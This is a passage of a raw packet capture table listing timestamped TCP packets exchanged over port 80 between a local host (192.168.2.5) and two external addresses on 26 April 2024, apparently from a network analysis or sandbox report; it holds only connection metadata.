Apr 26, 2024 17:11:12.571377993 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571388960 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.571413994 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571430922 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.571449995 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571485996 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571521044 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571531057 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.571557045 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571592093 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571592093 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.571626902 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571640015 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.571662903 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571697950 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571729898 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.571732998 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571783066 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.571790934 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571826935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571862936 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571877956 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.571897984 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571933985 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571969986 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571979046 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572005033 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572043896 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572056055 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572082996 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572089911 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572158098 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572192907 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572233915 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572244883 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572268963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572277069 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572304010 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572340012 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572345018 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572375059 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572410107 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572447062 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572460890 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572483063 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572490931 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572520018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572555065 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572590113 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572608948 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572626114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572643042 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572659969 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572695971 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572727919 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572731018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572767973 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572784901 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572803020 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572838068 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572873116 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572885990 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.572911978 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.572916031 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.672763109 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.672833920 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.672853947 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:12.672872066 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.672909021 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.672926903 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:12.672926903 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:12.672946930 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.672960043 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:12.673000097 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:12.680655956 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.697710991 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:12.697782040 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:12.742490053 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.742533922 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.742626905 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.787391901 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.787437916 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.787476063 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.787528992 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.787532091 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.787575960 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.787583113 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.787619114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.787655115 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.787688971 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.787714958 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.787801981 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.788562059 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.788602114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.788726091 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.789155960 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789196014 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789232969 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789267063 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789284945 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.789303064 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789314032 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.789422035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789460897 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789477110 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.789499044 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789535046 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789567947 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.789572001 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789607048 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789619923 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.789644003 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789679050 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789715052 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789735079 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.789752007 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789772034 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.789788961 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789824963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789860964 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789871931 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.789897919 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789932966 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.789947033 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.789968967 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790004015 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790018082 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.790043116 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790074110 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.790098906 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790157080 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790193081 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790214062 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.790229082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790244102 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.790265083 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790301085 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790318012 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.790335894 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790369987 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790405035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790421963 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.790441990 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790457964 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.790478945 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790513992 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790535927 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.790550947 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790585995 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790628910 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790642023 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.790663004 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790679932 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.790698051 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790734053 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790757895 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.790769100 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790806055 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.790822029 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.791040897 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.791079044 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.791095972 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.791115999 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.791155100 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.791177034 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.791191101 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.791248083 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.792171001 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.792208910 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.792263031 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.792300940 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.792309999 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.792337894 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.792346954 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.792968035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793006897 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793051004 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.793107986 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793144941 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793159008 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.793183088 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793217897 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793253899 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793271065 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.793291092 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793303967 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.793325901 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793361902 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793397903 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793411016 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.793431997 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793467999 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793481112 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.793503046 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793520927 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.793539047 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793576002 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793611050 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793623924 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.793648005 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.793674946 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.818774939 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.818818092 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.818856001 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.818859100 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.818892002 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.818918943 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.818928003 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.818964005 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.818980932 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.819000959 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.819061995 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.819072008 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.819463968 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.819502115 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.819524050 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.819843054 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.819880962 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.819900036 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.819916010 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.819953918 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.819988966 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.820024967 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.820025921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.820058107 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.820060968 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.820096970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.820118904 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.820147991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.820597887 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.825675964 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.825736046 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.825793028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.825829029 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.825853109 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.825898886 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.827635050 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.827673912 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.827711105 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.827748060 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.827752113 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.827784061 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.827795029 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.827820063 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.827857018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.827893972 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.827905893 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.827929020 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.827939034 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.827965975 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.828011990 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.828283072 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.828324080 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.828419924 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.829715967 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.829756021 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.829792023 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.829828978 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.829847097 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.829878092 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.830163002 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830199003 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830255985 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.830265045 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830305099 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830363035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830363035 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.830399036 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830435991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830473900 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830493927 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.830511093 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830517054 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.830563068 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830600977 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830610991 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.830636978 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830672026 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830707073 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830733061 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.830743074 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830754995 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.830777884 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830813885 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830827951 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.830849886 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830885887 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.830915928 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.831207991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831243992 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831279993 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831299067 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.831315994 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831319094 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.831351995 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831420898 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831451893 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.831458092 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831496954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831507921 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.831532001 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831568956 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831603050 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831623077 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.831639051 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831646919 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.831675053 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.831810951 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.837086916 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837127924 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837167025 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837193012 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.837203026 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837239027 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837275028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837308884 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.837330103 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837337017 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.837367058 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837421894 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837424994 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.837459087 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837495089 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837512016 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.837529898 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837565899 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837589025 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.837601900 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837635994 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837666988 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.837681055 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837722063 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837759972 CEST	80	49713	176.97.76.106	192.168.2.5
